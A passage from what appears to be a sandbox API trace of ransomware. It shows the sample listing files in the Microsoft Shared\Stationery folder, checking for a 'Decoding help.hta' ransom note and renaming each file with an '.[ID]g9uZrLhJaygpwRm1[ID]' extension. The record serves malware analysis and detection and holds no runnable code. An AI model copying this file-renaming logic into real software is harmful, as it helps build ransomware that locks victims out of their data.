ftLastWriteTime.dwHighDateTime=0x1c9ea0c, nFileSizeHigh=0x0, nFileSizeLow=0x3da0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Sand_Paper.jpg", cAlternateFileName="")) returned 1 [0051.682] lstrcpyW (in: lpString1=0x1108f868, lpString2="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\*.*") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\*.*" [0051.682] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\*.*") returned 65 [0051.682] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Decoding help.hta") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Decoding help.hta" [0051.682] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Decoding help.hta" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\decoding help.hta")) returned 0x1 [0051.683] lstrcmpiW (lpString1="Decoding help.hta", lpString2="Sand_Paper.jpg") returned -1 [0051.683] lstrlenW (lpString="Sand_Paper.jpg") returned 14 [0051.683] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\*.*") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\*.*" [0051.683] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\*.*") returned 65 [0051.683] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\", lpString2="Sand_Paper.jpg" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Sand_Paper.jpg") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Sand_Paper.jpg" [0051.683] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Sand_Paper.jpg" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Sand_Paper.jpg") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Sand_Paper.jpg" [0051.683] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Sand_Paper.jpg", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Sand_Paper.jpg.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Sand_Paper.jpg.[ID]g9uZrLhJaygpwRm1[ID]" [0051.683] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Sand_Paper.jpg" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\sand_paper.jpg"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Sand_Paper.jpg.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\sand_paper.jpg.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0051.683] FindNextFileW (in: hFindFile=0x5da7f8, lpFindFileData=0x18bdfd30 | out: lpFindFileData=0x18bdfd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc5277366, ftCreationTime.dwHighDateTime=0x1ca0416, ftLastAccessTime.dwLowDateTime=0xc5277366, ftLastAccessTime.dwHighDateTime=0x1ca0416, ftLastWriteTime.dwLowDateTime=0x4516ee37, ftLastWriteTime.dwHighDateTime=0x1c9ea0c, nFileSizeHigh=0x0, nFileSizeLow=0x91c4, dwReserved0=0x0, dwReserved1=0x0, cFileName="Seyes.emf", cAlternateFileName="")) returned 1 [0051.683] lstrcpyW (in: lpString1=0x1108f868, lpString2="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\*.*") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\*.*" [0051.683] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\*.*") returned 65 [0051.683] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Decoding help.hta") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Decoding help.hta" [0051.683] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Decoding help.hta" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\decoding help.hta")) returned 0x1 [0051.683] lstrcmpiW (lpString1="Decoding help.hta", lpString2="Seyes.emf") returned -1 [0051.683] lstrlenW (lpString="Seyes.emf") returned 9 [0051.683] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\*.*") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\*.*" [0051.683] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\*.*") returned 65 [0051.683] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\", lpString2="Seyes.emf" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Seyes.emf") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Seyes.emf" [0051.683] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Seyes.emf" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Seyes.emf") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Seyes.emf" [0051.683] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Seyes.emf", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Seyes.emf.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Seyes.emf.[ID]g9uZrLhJaygpwRm1[ID]" [0051.683] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Seyes.emf" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\seyes.emf"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Seyes.emf.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\seyes.emf.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0051.684] FindNextFileW (in: hFindFile=0x5da7f8, lpFindFileData=0x18bdfd30 | out: lpFindFileData=0x18bdfd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xce3b7523, ftCreationTime.dwHighDateTime=0x1ca040d, ftLastAccessTime.dwLowDateTime=0xce3b7523, ftLastAccessTime.dwHighDateTime=0x1ca040d, ftLastWriteTime.dwLowDateTime=0xce17c0b0, ftLastWriteTime.dwHighDateTime=0x1ca040d, nFileSizeHigh=0x0, nFileSizeLow=0xed, dwReserved0=0x0, dwReserved1=0x0, cFileName="Shades of Blue.htm", cAlternateFileName="")) returned 1 [0051.684] lstrcpyW (in: lpString1=0x1108f868, lpString2="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\*.*") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\*.*" [0051.684] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\*.*") returned 65 [0051.684] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Decoding help.hta") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Decoding help.hta" [0051.684] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Decoding help.hta" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\decoding help.hta")) returned 0x1 [0051.684] lstrcmpiW (lpString1="Decoding help.hta", lpString2="Shades of Blue.htm") returned -1 [0051.684] lstrlenW (lpString="Shades of Blue.htm") returned 18 [0051.684] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\*.*") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\*.*" [0051.684] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\*.*") returned 65 [0051.684] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\", lpString2="Shades of Blue.htm" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Shades of Blue.htm") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Shades of Blue.htm" [0051.684] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Shades of Blue.htm" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Shades of Blue.htm") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Shades of Blue.htm" [0051.684] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Shades of Blue.htm", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Shades of Blue.htm.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Shades of Blue.htm.[ID]g9uZrLhJaygpwRm1[ID]" [0051.684] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Shades of Blue.htm" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\shades of blue.htm"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Shades of Blue.htm.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\shades of blue.htm.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0051.684] FindNextFileW (in: hFindFile=0x5da7f8, lpFindFileData=0x18bdfd30 | out: lpFindFileData=0x18bdfd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xce3b7523, ftCreationTime.dwHighDateTime=0x1ca040d, ftLastAccessTime.dwLowDateTime=0xce3b7523, ftLastAccessTime.dwHighDateTime=0x1ca040d, ftLastWriteTime.dwLowDateTime=0xaa58d6e3, ftLastWriteTime.dwHighDateTime=0x1c9ea0c, nFileSizeHigh=0x0, nFileSizeLow=0x127e, dwReserved0=0x0, dwReserved1=0x0, cFileName="ShadesOfBlue.jpg", cAlternateFileName="")) returned 1 [0051.684] lstrcpyW (in: lpString1=0x1108f868, lpString2="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\*.*") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\*.*" [0051.684] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\*.*") returned 65 [0051.684] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Decoding help.hta") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Decoding help.hta" [0051.684] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Decoding help.hta" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\decoding help.hta")) returned 0x1 [0051.685] lstrcmpiW (lpString1="Decoding help.hta", lpString2="ShadesOfBlue.jpg") returned -1 [0051.685] lstrlenW (lpString="ShadesOfBlue.jpg") returned 16 [0051.685] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\*.*") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\*.*" [0051.685] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\*.*") returned 65 [0051.685] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\", lpString2="ShadesOfBlue.jpg" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\ShadesOfBlue.jpg") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\ShadesOfBlue.jpg" [0051.685] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\ShadesOfBlue.jpg" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\ShadesOfBlue.jpg") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\ShadesOfBlue.jpg" [0051.685] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\ShadesOfBlue.jpg", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\ShadesOfBlue.jpg.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\ShadesOfBlue.jpg.[ID]g9uZrLhJaygpwRm1[ID]" [0051.685] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\ShadesOfBlue.jpg" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\shadesofblue.jpg"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\ShadesOfBlue.jpg.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\shadesofblue.jpg.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0052.438] FindNextFileW (in: hFindFile=0x5da7f8, lpFindFileData=0x18bdfd30 | out: lpFindFileData=0x18bdfd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc530f8da, ftCreationTime.dwHighDateTime=0x1ca0416, ftLastAccessTime.dwLowDateTime=0xc530f8da, ftLastAccessTime.dwHighDateTime=0x1ca0416, ftLastWriteTime.dwLowDateTime=0x45194f95, ftLastWriteTime.dwHighDateTime=0x1c9ea0c, nFileSizeHigh=0x0, nFileSizeLow=0x13d8c, dwReserved0=0x0, dwReserved1=0x0, cFileName="Shorthand.emf", cAlternateFileName="")) returned 1 [0052.438] lstrcpyW (in: lpString1=0x114950c8, lpString2="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\*.*") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\*.*" [0052.438] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\*.*") returned 65 [0052.438] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Decoding help.hta") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Decoding help.hta" [0052.438] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Decoding help.hta" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\decoding help.hta")) returned 0x1 [0052.438] lstrcmpiW (lpString1="Decoding help.hta", lpString2="Shorthand.emf") returned -1 [0052.438] lstrlenW (lpString="Shorthand.emf") returned 13 [0052.439] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\*.*") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\*.*" [0052.439] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\*.*") returned 65 [0052.439] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\", lpString2="Shorthand.emf" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Shorthand.emf") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Shorthand.emf" [0052.439] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Shorthand.emf" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Shorthand.emf") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Shorthand.emf" [0052.439] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Shorthand.emf", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Shorthand.emf.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Shorthand.emf.[ID]g9uZrLhJaygpwRm1[ID]" [0052.439] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Shorthand.emf" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\shorthand.emf"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Shorthand.emf.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\shorthand.emf.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0052.439] FindNextFileW (in: hFindFile=0x5da7f8, lpFindFileData=0x18bdfd30 | out: lpFindFileData=0x18bdfd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc541a265, ftCreationTime.dwHighDateTime=0x1ca0416, ftLastAccessTime.dwLowDateTime=0xc541a265, ftLastAccessTime.dwHighDateTime=0x1ca0416, ftLastWriteTime.dwLowDateTime=0x451bb0f3, ftLastWriteTime.dwHighDateTime=0x1c9ea0c, nFileSizeHigh=0x0, nFileSizeLow=0x7c6, dwReserved0=0x0, dwReserved1=0x0, cFileName="Small_News.jpg", cAlternateFileName="")) returned 1 [0052.439] lstrcpyW (in: lpString1=0x114950c8, lpString2="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\*.*") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\*.*" [0052.439] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\*.*") returned 65 [0052.439] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Decoding help.hta") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Decoding help.hta" [0052.439] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Decoding help.hta" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\decoding help.hta")) returned 0x1 [0052.439] lstrcmpiW (lpString1="Decoding help.hta", lpString2="Small_News.jpg") returned -1 [0052.439] lstrlenW (lpString="Small_News.jpg") returned 14 [0052.439] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\*.*") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\*.*" [0052.439] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\*.*") returned 65 [0052.439] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\", lpString2="Small_News.jpg" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Small_News.jpg") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Small_News.jpg" [0052.439] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Small_News.jpg" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Small_News.jpg") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Small_News.jpg" [0052.439] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Small_News.jpg", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Small_News.jpg.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Small_News.jpg.[ID]g9uZrLhJaygpwRm1[ID]" [0052.439] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Small_News.jpg" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\small_news.jpg"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Small_News.jpg.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\small_news.jpg.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0052.440] FindNextFileW (in: hFindFile=0x5da7f8, lpFindFileData=0x18bdfd30 | out: lpFindFileData=0x18bdfd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xce3dd680, ftCreationTime.dwHighDateTime=0x1ca040d, ftLastAccessTime.dwLowDateTime=0xce3dd680, ftLastAccessTime.dwHighDateTime=0x1ca040d, ftLastWriteTime.dwLowDateTime=0xce1a220d, ftLastWriteTime.dwHighDateTime=0x1ca040d, nFileSizeHigh=0x0, nFileSizeLow=0xe8, dwReserved0=0x0, dwReserved1=0x0, cFileName="Soft Blue.htm", cAlternateFileName="")) returned 1 [0052.440] lstrcpyW (in: lpString1=0x114950c8, lpString2="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\*.*") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\*.*" [0052.440] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\*.*") returned 65 [0052.440] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Decoding help.hta") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Decoding help.hta" [0052.440] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Decoding help.hta" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\decoding help.hta")) returned 0x1 [0052.440] lstrcmpiW (lpString1="Decoding help.hta", lpString2="Soft Blue.htm") returned -1 [0052.440] lstrlenW (lpString="Soft Blue.htm") returned 13 [0052.440] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\*.*") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\*.*" [0052.440] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\*.*") returned 65 [0052.440] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\", lpString2="Soft Blue.htm" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Soft Blue.htm") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Soft Blue.htm" [0052.440] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Soft Blue.htm" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Soft Blue.htm") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Soft Blue.htm" [0052.440] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Soft Blue.htm", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Soft Blue.htm.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Soft Blue.htm.[ID]g9uZrLhJaygpwRm1[ID]" [0052.440] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Soft Blue.htm" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\soft blue.htm"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Soft Blue.htm.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\soft blue.htm.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0053.063] FindNextFileW (in: hFindFile=0x5da7f8, lpFindFileData=0x18bdfd30 | out: lpFindFileData=0x18bdfd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xce3dd680, ftCreationTime.dwHighDateTime=0x1ca040d, ftLastAccessTime.dwLowDateTime=0xce3dd680, ftLastAccessTime.dwHighDateTime=0x1ca040d, ftLastWriteTime.dwLowDateTime=0xaa5b3841, ftLastWriteTime.dwHighDateTime=0x1c9ea0c, nFileSizeHigh=0x0, nFileSizeLow=0x2949, dwReserved0=0x0, dwReserved1=0x0, cFileName="SoftBlue.jpg", cAlternateFileName="")) returned 1 [0053.063] lstrcpyW (in: lpString1=0x11741c80, lpString2="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\*.*") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\*.*" [0053.063] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\*.*") returned 65 [0053.063] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Decoding help.hta") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Decoding help.hta" [0053.063] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common 